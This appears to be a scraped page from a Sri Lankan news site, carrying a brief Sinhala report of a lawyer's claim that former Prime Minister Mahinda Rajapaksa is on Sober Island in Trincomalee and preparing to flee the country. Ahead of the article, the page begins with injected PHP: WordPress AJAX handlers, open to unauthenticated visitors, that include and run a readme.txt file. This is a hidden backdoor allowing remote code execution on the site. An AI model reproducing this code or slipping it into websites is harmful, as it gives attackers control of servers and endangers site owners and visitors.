if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මහින්ද සෝබර් දුපතේ…? රටින් යන්න ගුවන් යානාවක් ඇවිත්..? - mediahumanrights.lk
mediahumanrights.lk
Local News News

මහින්ද සෝබර් දුපතේ…? රටින් යන්න ගුවන් යානාවක් ඇවිත්..?

හිටපු අග්‍රාමාත්‍ය මහින්ද රාජපක්ෂ මහතා දැන් රැඳී සිටින්නේ ත‍්‍රිකුණාමල වරායේ පිහිටි සෝබර් දූපතේ බව නීතිඥ නාගානන්ද කොඩිතුවක්කු මහතා සඳහන් කරයි.

ඔහු එහි රැඳී සිට විදේශ රටකට පලා යාමේ සුදානමක සිටින බවද හෙතෙම කියා සිටී.

දැනටත නයිජීරියාවේ සිට පැමිණි ගුවන් යානයක් කටුනායක ගුවන් තොටුපලේ නවත්වා ඇති බවත් එමගින් ඔහු විදේශගතවන බවත් ඔහු පවසයි.

මේ හේතුවෙන් ඔහුගේ විදේශ ගමන් බලපත්‍රය රාජසන්තක කිරීමට කටයුතු කළ කරන්නයි ඉල්ලුවද මෙතෙක් ඊට ප්‍රතිචාරයක් ලැබී නැතැයිද හෙතෙම කියා සිටී.

අන්තර්ජාල නාලිකාවක සාකච්චාවකදී ඔහු මෙම අදහස් පල කර ඇත.

Related posts

පෙට‍්‍රල්-ඩීසල් යෝජිත නව මිල ගණන් මෙන්න.. එය ඉතිහාසයේ වැඩිම ඉන්ධන මිලයි..

Shiran Viraj

පොදු වැසිකිලි උද්දමනය අහසට.. එක් වරක් භාවිතයට රුපියල් සීයයි…

Shiran Viraj

තවත් වංචා දුෂණ ෆයිල් තොගයක් ලැබුනා..

Shiran Viraj